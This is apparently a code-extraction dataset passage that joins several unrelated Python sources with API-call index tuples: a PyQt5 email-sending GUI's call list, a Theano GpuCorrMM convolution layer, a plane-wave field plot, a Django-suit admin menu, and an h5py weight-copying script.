QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((12968, 12982), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""查詢 :"""'], {}), "('查詢 :')\n", (12974, 12982), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((13447, 13471), 'copy.deepcopy', 'deepcopy', (['self.data_logs'], {}), '(self.data_logs)\n', (13455, 13471), False, 'from copy import deepcopy\n'), ((15075, 15141), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (15098, 15141), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17899, 17969), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""請確認有無 SMTP 資料!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)\n", (17918, 17969), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19891, 19963), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '"""另存為..."""', '"""./"""', '"""Excel Files (*.eml)"""'], {}), "(self, '另存為...', './', 'Excel Files (*.eml)')\n", (19918, 19963), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((20123, 20189), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (20146, 20189), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22463, 22528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""缺少資料"""', '"""請確認是否有資料可以下載"""', 'QMessageBox.Ok'], {}), "(self, '缺少資料', '請確認是否有資料可以下載', QMessageBox.Ok)\n", (22482, 22528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((9197, 9210), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (9203, 9210), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((10310, 10323), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (10316, 10323), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((11182, 11195), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (11188, 11195), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((13358, 13368), 'server.database.Database', 'Database', ([], {}), '()\n', (13366, 13368), False, 'from server.database import Database\n'), ((14464, 14528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""資料庫連結失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)\n", (14483, 14528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15172, 15233), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (15191, 15233), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((16755, 16763), 'server.client.Client', 'Client', ([], {}), '()\n', (16761, 16763), False, 'from server.client import Client\n'), ((16933, 17001), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""排程設定成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '排程設定成功!', QMessageBox.Ok)\n", (16956, 17001), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17326, 17426), 'GenAndSendMail.insert_send_mail', 'insert_send_mail', (['eml_type', 'eml_file', 'user_group', 'mail_excel', 'sm', 'db'], {'annex': 'annex_file', 'url': 'url'}), '(eml_type, eml_file, user_group, mail_excel, sm, db, annex=\n annex_file, url=url)\n', (17342, 17426), False, 'from GenAndSendMail import insert_send_mail\n'), ((17519, 17587), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""信件寄出成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n", (17542, 17587), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17616, 17679), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""信件寄出失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n", (17635, 17679), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18773, 18836), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""信件寄出失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n", (18792, 18836), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19762, 19798), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html', 'annex_file'], {}), '(header, html, annex_file)\n', (19772, 19798), True, 'import mylibrary.genmail as gm\n'), ((19838, 19862), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html'], {}), '(header, html)\n', (19848, 19862), True, 'import mylibrary.genmail as gm\n'), ((20036, 20064), 'email.generator.Generator', 'generator.Generator', (['outfile'], {}), '(outfile)\n', (20055, 20064), False, 'from email import generator\n'), ((20218, 20279), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (20237, 20279), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22015, 22088), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '"""另存為..."""', '"""./"""', '"""Excel Files (*.xlsx)"""'], {}), "(self, '另存為...', './', 'Excel Files (*.xlsx)')\n", (22042, 22088), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22172, 22202), 'pandas.DataFrame', 'DataFrame', (['self.data_temp_logs'], {}), '(self.data_temp_logs)\n', (22181, 22202), False, 'from pandas import DataFrame\n'), ((22272, 22338), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (22295, 22338), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17150, 17156), 'server.sendmail.Smtp', 'Smtp', ([], {}), '()\n', (17154, 17156), False, 'from server.sendmail import Smtp\n'), ((17298, 17308), 'server.database.Database', 'Database', ([], {}), '()\n', (17306, 17308), False, 'from server.database import Database\n'), ((18503, 18589), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Warning!"""', "('信件寄出成功!\\nWaning: ' + error)", 'QMessageBox.Ok'], {}), "(self, 'Warning!', '信件寄出成功!\\nWaning: ' + error,\n QMessageBox.Ok)\n", (18522, 18589), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18626, 18694), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""信件寄出成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n", (18649, 18694), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((20429, 20440), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (20438, 20440), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22375, 22436), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (22394, 22436), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((14893, 14904), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (14902, 14904), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((14992, 15003), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ([], {}), '()\n', (15001, 15003), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((21802, 21823), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\n', (21808, 21823), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n'), ((14354, 14375), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\n', (14360, 14375), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n')]
""" GpuCorrMM-based convolutional layers """ import numpy as np import theano import theano.tensor as T from theano.sandbox.cuda.basic_ops import gpu_contiguous from theano.sandbox.cuda.blas import GpuCorrMM from .. import init from .. import nonlinearities from . import base # base class for all layers that rely on GpuCorrMM directly class MMLayer(base.Layer): pass class Conv2DMMLayer(MMLayer): def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False, W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None, flip_filters=False): super(Conv2DMMLayer, self).__init__(input_layer) if nonlinearity is None: self.nonlinearity = nonlinearities.identity else: self.nonlinearity = nonlinearity self.num_filters = num_filters self.filter_size = filter_size self.strides = strides self.untie_biases = untie_biases self.flip_filters = flip_filters if border_mode is not None and pad is not None: raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.") elif border_mode is None and pad is None: # no option specified, default to valid mode self.pad = (0, 0) elif border_mode is not None: if border_mode == 'valid': self.pad = (0, 0) elif border_mode == 'full': self.pad = (self.filter_size[0] - 1, self.filter_size[1] -1) elif border_mode == 'same': # only works for odd filter size, but the even filter size case is probably not worth supporting. self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2) else: raise RuntimeError("Unsupported border_mode for Conv2DMMLayer: %s" % border_mode) else: self.pad = pad self.W = self.create_param(W, self.get_W_shape()) if b is None: self.b = None elif self.untie_biases: output_shape = self.get_output_shape() self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3])) else: self.b = self.create_param(b, (num_filters,)) self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad) def get_W_shape(self): num_input_channels = self.input_layer.get_output_shape()[1] return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1]) def get_params(self): return [self.W] + self.get_bias_params() def get_bias_params(self): return [self.b] if self.b is not None else [] def get_output_shape_for(self, input_shape): batch_size = input_shape[0] input_width, input_height = input_shape[2:4] output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1 output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1 return (batch_size, self.num_filters, output_width, output_height) def get_output_for(self, input, *args, **kwargs): filters = self.W if self.flip_filters: filters = filters[:, :, ::-1, ::-1] # flip width, height contiguous_filters = gpu_contiguous(filters) contiguous_input = gpu_contiguous(input) conved = self.corr_mm_op(contiguous_input, contiguous_filters) if self.b is None: activation = conved elif self.untie_biases: activation = conved + self.b.dimshuffle('x', 0, 1, 2) else: activation = conved + self.b.dimshuffle('x', 0, 'x', 'x') return self.nonlinearity(activation)
[ "theano.sandbox.cuda.basic_ops.gpu_contiguous", "theano.sandbox.cuda.blas.GpuCorrMM" ]
[((2405, 2452), 'theano.sandbox.cuda.blas.GpuCorrMM', 'GpuCorrMM', ([], {'subsample': 'self.strides', 'pad': 'self.pad'}), '(subsample=self.strides, pad=self.pad)\n', (2414, 2452), False, 'from theano.sandbox.cuda.blas import GpuCorrMM\n'), ((3436, 3459), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['filters'], {}), '(filters)\n', (3450, 3459), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n'), ((3487, 3508), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['input'], {}), '(input)\n', (3501, 3508), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n')]
import numpy as np import matplotlib import matplotlib.pyplot as plt import sys sys.path.append("../") from quelea import * nx = 217 ny = 133 x0 = 0 x1 = 30 # lambdas y0 = 0 y1 = 20 # lambdas xs = np.linspace(x0, x1, nx) ys = np.linspace(y0, y1, ny) # 2d array of (x, y, z, t) coords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] ) # for map_fields function this should be converted from 2D to 1D array coords = coords.reshape((4 * nx * ny,)) ftype = 1 # plane wave a0 = 1 # normalized field amplitude omega = 1 # frequency fparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave ex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam) # now convert to 2d arrays ex = ex.reshape((nx, ny)) ey = ey.reshape((nx, ny)) ez = ez.reshape((nx, ny)) bx = bx.reshape((nx, ny)) by = by.reshape((nx, ny)) bz = bz.reshape((nx, ny)) ex = ex.transpose() ey = ey.transpose() ez = ez.transpose() bx = bx.transpose() by = by.transpose() bz = bz.transpose() plt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1]) plt.colorbar() plt.clim(-a0, a0) plt.savefig("map_fields.pdf")
[ "matplotlib.pyplot.imshow", "matplotlib.pyplot.clim", "matplotlib.pyplot.savefig", "matplotlib.pyplot.colorbar", "numpy.array", "numpy.linspace", "sys.path.append" ]
[((81, 103), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (96, 103), False, 'import sys\n'), ((201, 224), 'numpy.linspace', 'np.linspace', (['x0', 'x1', 'nx'], {}), '(x0, x1, nx)\n', (212, 224), True, 'import numpy as np\n'), ((230, 253), 'numpy.linspace', 'np.linspace', (['y0', 'y1', 'ny'], {}), '(y0, y1, ny)\n', (241, 253), True, 'import numpy as np\n'), ((291, 339), 'numpy.array', 'np.array', (['[[x, y, 0, 0] for x in xs for y in ys]'], {}), '([[x, y, 0, 0] for x in xs for y in ys])\n', (299, 339), True, 'import numpy as np\n'), ((974, 1044), 'matplotlib.pyplot.imshow', 'plt.imshow', (['ey'], {'cmap': '"""RdYlBu"""', 'origin': '"""lower"""', 'extent': '[x0, x1, y0, y1]'}), "(ey, cmap='RdYlBu', origin='lower', extent=[x0, x1, y0, y1])\n", (984, 1044), True, 'import matplotlib.pyplot as plt\n'), ((1051, 1065), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (1063, 1065), True, 'import matplotlib.pyplot as plt\n'), ((1066, 1083), 'matplotlib.pyplot.clim', 'plt.clim', (['(-a0)', 'a0'], {}), '(-a0, a0)\n', (1074, 1083), True, 'import matplotlib.pyplot as plt\n'), ((1085, 1114), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""map_fields.pdf"""'], {}), "('map_fields.pdf')\n", (1096, 1114), True, 'import matplotlib.pyplot as plt\n')]
from django.conf import settings from suit import apps from suit.apps import DjangoSuitConfig from suit.menu import ParentItem, ChildItem APP_NAME = settings.APP_NAME WIKI_URL = settings.WIKI_URL class SuitConfig(DjangoSuitConfig): name = 'suit' verbose_name = 'Mbiome Core JAXid Generator' site_title = 'Mbiome Core JAXid Tracking' site_header = site_title index_title = verbose_name layout = 'vertical' list_per_page = 35 # header_date_format = 'l, d-M-o' # header_time_format = 'H:i e' menu = ( ParentItem('JAX Id Record Lists', use_first_child_url=True, url='', children=[ ChildItem('JAXid Records', model='id_generate.jaxiddetail'), ChildItem(model='id_generate.boxid'), ChildItem(model='id_generate.plateid'), ], icon='fa fa-list-ul'), ParentItem('Reference Data', use_first_child_url=True, url='', children=[ ChildItem(model='id_generate.projectcode'), ChildItem(model='id_generate.nucleicacidtype'), ChildItem(model='id_generate.sampletype'), ChildItem(model='id_generate.sequencingtype'), ], icon='fa fa-list'), ParentItem( label='Generate new JAXid''s', url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/', permissions='id_generate.change_jaxiddetail', icon='fa fa-rocket'), ParentItem( label='Generate new Box ID''s', url=f'/{APP_NAME}/manage/id_generate/boxid/import/', permissions='id_generate.change_boxid', icon='fa fa-cube'), ParentItem( label='Generate new Plate ID''s', url=f'/{APP_NAME}/manage/id_generate/plateid/import/', permissions='id_generate.change_plateid', icon='fa fa-circle-o-notch'), ParentItem( label='Authorization', children=[ ChildItem('Staff', model='auth.user'), ChildItem(model='auth.group'), ChildItem(model='admin.logentry'), ], icon='fa fa-user-circle'), ParentItem( label='SOP and Request Sheet', use_first_child_url=False, url='', children=[ ChildItem('View JAX ID Request SOP', target_blank=True, url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'), ChildItem('View JAX ID Request Template Sheet', url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'), ], icon='fa fa-file'), ) # menu_handler = None menu_show_home = False # Show changelist top actions only if any row is selected toggle_changelist_top_actions = False # # Enables two column layout for change forms with submit row on the right form_submit_on_right = False # Hide name/"original" column for all tabular inlines. # May be overridden in Inline class by suit_form_inlines_hide_original = False #form_inlines_hide_original = False form_size = { 'default': apps.SUIT_FORM_SIZE_LARGE, 'widgets': { 'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE, 'Textarea': apps.SUIT_FORM_SIZE_X_LARGE, }, } # form_size setting can be overridden in ModelAdmin using suit_form_size parameter # # Example: # ---------------------------------------------- # suit_form_size = { # 'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10', # 'fields': { # 'field_name': SUIT_FORM_SIZE_LARGE, # 'field_name2': SUIT_FORM_SIZE_X_LARGE, # }, # 'widgets': { # 'widget_class_name': SUIT_FORM_SIZE_FULL, # 'AdminTextareaWidget': SUIT_FORM_SIZE_FULL, # }, # 'fieldsets': { # 'fieldset_name': SUIT_FORM_SIZE_FULL, # 'fieldset_name2': SUIT_FORM_SIZE_FULL, # } # }
[ "suit.menu.ChildItem", "suit.menu.ParentItem" ]
[((1411, 1586), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new JAXids"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/jaxiddetail/import/"""', 'permissions': '"""id_generate.change_jaxiddetail"""', 'icon': '"""fa fa-rocket"""'}), "(label='Generate new JAXids', url=\n f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/', permissions=\n 'id_generate.change_jaxiddetail', icon='fa fa-rocket')\n", (1421, 1586), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1657, 1819), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new Box IDs"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/boxid/import/"""', 'permissions': '"""id_generate.change_boxid"""', 'icon': '"""fa fa-cube"""'}), "(label='Generate new Box IDs', url=\n f'/{APP_NAME}/manage/id_generate/boxid/import/', permissions=\n 'id_generate.change_boxid', icon='fa fa-cube')\n", (1667, 1819), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1890, 2068), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new Plate IDs"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/plateid/import/"""', 'permissions': '"""id_generate.change_plateid"""', 'icon': '"""fa fa-circle-o-notch"""'}), "(label='Generate new Plate IDs', url=\n f'/{APP_NAME}/manage/id_generate/plateid/import/', permissions=\n 'id_generate.change_plateid', icon='fa fa-circle-o-notch')\n", (1900, 2068), False, 'from suit.menu import ParentItem, ChildItem\n'), ((703, 762), 'suit.menu.ChildItem', 'ChildItem', (['"""JAXid Records"""'], {'model': '"""id_generate.jaxiddetail"""'}), "('JAXid Records', model='id_generate.jaxiddetail')\n", (712, 762), False, 'from suit.menu import ParentItem, ChildItem\n'), ((784, 820), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.boxid"""'}), "(model='id_generate.boxid')\n", (793, 820), False, 'from suit.menu import ParentItem, ChildItem\n'), ((842, 880), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.plateid"""'}), "(model='id_generate.plateid')\n", (851, 880), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1098, 1140), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.projectcode"""'}), "(model='id_generate.projectcode')\n", (1107, 1140), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1162, 1208), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.nucleicacidtype"""'}), "(model='id_generate.nucleicacidtype')\n", (1171, 1208), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1230, 1271), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.sampletype"""'}), "(model='id_generate.sampletype')\n", (1239, 1271), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1293, 1338), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.sequencingtype"""'}), "(model='id_generate.sequencingtype')\n", (1302, 1338), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2237, 2274), 'suit.menu.ChildItem', 'ChildItem', (['"""Staff"""'], {'model': '"""auth.user"""'}), "('Staff', model='auth.user')\n", (2246, 2274), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2296, 2325), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""auth.group"""'}), "(model='auth.group')\n", (2305, 2325), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2347, 2380), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""admin.logentry"""'}), "(model='admin.logentry')\n", (2356, 2380), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2634, 2845), 'suit.menu.ChildItem', 'ChildItem', (['"""View JAX ID Request SOP"""'], {'target_blank': '(True)', 'url': 'f"""{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx"""'}), "('View JAX ID Request SOP', target_blank=True, url=\n f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'\n )\n", (2643, 2845), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2917, 3142), 'suit.menu.ChildItem', 'ChildItem', (['"""View JAX ID Request Template Sheet"""'], {'url': 'f"""{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx"""'}), "('View JAX ID Request Template Sheet', url=\n f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'\n )\n", (2926, 3142), False, 'from suit.menu import ParentItem, ChildItem\n')]
import h5py import numpy as np np.set_printoptions(threshold=np.nan) from shutil import copyfile copyfile("dummy_lutnet.h5", "pretrained_bin.h5") # create pretrained.h5 using datastructure from dummy.h5 bl = h5py.File("baseline_pruned.h5", 'r') #dummy = h5py.File("dummy.h5", 'r') pretrained = h5py.File("pretrained_bin.h5", 'r+') # dense layer 1 bl_w1 = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"] zero_fill = np.zeros(np.shape(np.array(bl_w1))) pret_w1 = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"] pret_w1[...] = np.array(bl_w1) p_gamma[...] = np.array(bl_gamma) pret_pruning_mask[...] = np.array(bl_pruning_mask) 